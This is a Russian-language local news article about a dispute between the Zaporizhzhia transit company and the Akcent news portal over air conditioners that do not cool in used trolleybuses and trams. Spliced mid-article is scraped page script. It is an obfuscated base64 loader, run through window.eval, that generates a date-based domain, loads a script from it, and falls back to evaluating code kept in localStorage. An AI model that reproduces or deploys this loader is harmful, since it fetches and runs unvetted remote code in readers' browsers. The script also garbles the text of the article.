В «Запорожэлектротрансе» рассказали, почему кондиционеры в транспорте не справляются с жарой

На коммунальном предприятии отреагировали на публикацию «Акцента» о неработающих кондиционерах в недавно закупленных б/у троллейбусах и трамваях.

Напомним, вчера «Акцент» сообщал о том, что кондиционеры в б/у троллейбусах Van Holl не охлаждают воздух, а работают больше как вентиляторы, что с учетом высокой температуры воздуха и отсутствии форточек в машине делают тяжелым и некомфортным пребывание в салоне в жару. Кроме того, в трамваях KT4D не работают установленные кондиционеры в кабинах водителей, что в жаркую погоду создает дополнительную угрозу для их здоровья. Эту информацию нам подтвердил водитель трамвая, а еще раньше ее озвучивали сами сотрудники под постом в Фейсбук мэра Владимира Буряка.

В «Запорожэлектротрансе» ответили относительно как данной техники, так и в целом по ситуации с обеспечением и работой кондиционеров.

«По информации начальника автобусного парка Лесного С.И., по состоянию на настоящее время в пяти автобусах, работающих на маршрутах города установлены кондиционеры. 10.07.2020 на линию выйдет шестой автобус с установленным кондиционером. Работы по установке кондиционеров в автобусах проводятся и в дальнейшем. Также во всех салонах автобусов предусмотрена приточно-вытяжная вентиляция салона, которая включается водителем автобуса.

Также, начальники троллейбусных парков Переверзев О.В. и Конек В. М., а также трамвайного депо Шатохин А.В. сообщают, что во всех троллейбусных машинах VAN HOOL AG-300T и Днепр Т-103 кондиционеры установлены и работают. В троллейбусах Днепр Т — 203 кондиционеры установлены и работают в кабине водителя, в салоне предусмотрена приточно-вытяжная вентиляция. В трамваях KT4D предусмотрена и работает приточно-вытяжная вентиляция кабины водителя трамвая», — сообщает пресс-служба предприятия.. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

В тоже время, в «Запорожэлектротрансе» признают неэффективность работы кондиционеров в жару, но при этом делают вывод, что информация на нашем сайте не соответствует действительности:

«Начальник службы подвижного состава Чеверда Д.Д. сообщает, что в такую ​​жару эффект от кондиционеров сводится на нет из-за того, что через каждые 500-700 метров подвижной состав останавливается на остановках и открываются двери салона. Таким образом, информация, изложенная на информационно-аналитическом портале «Акцент» не соответствует действительности», — подытожили на ЗЭТ.

От редакции. Журналист «Акцента» сегодня проинспектировал работу кондиционера в троллейбусе Van Hool. Даже в не очень жаркую утреннюю погоду, кондиционер в салоне не охлаждал воздух, а выдавал примерно точно такой же воздух, как и в салоне. То есть работал, как приточно-вытяжная вентиляция.

В тоже время, следует отметить, кондиционеры в троллейбусах «Дніпро-103» и автобусах МАЗ работают более эффективно. Потому аргумент о причине слабой работы кондиционера из-за частых остановок и открытия дверей выглядит сомнительным. Учитывая, что в условиях карантина, в салонах работаю только первые двери, а два кондиционера в троллейбусе-гармошке из Нидерладнов находятся в середине салона. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/v-zaporozhelektrotranse-rasskazali-pochemu-konditsionery-v-transporte-ne-spravlyayutsya-s-zharoj/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top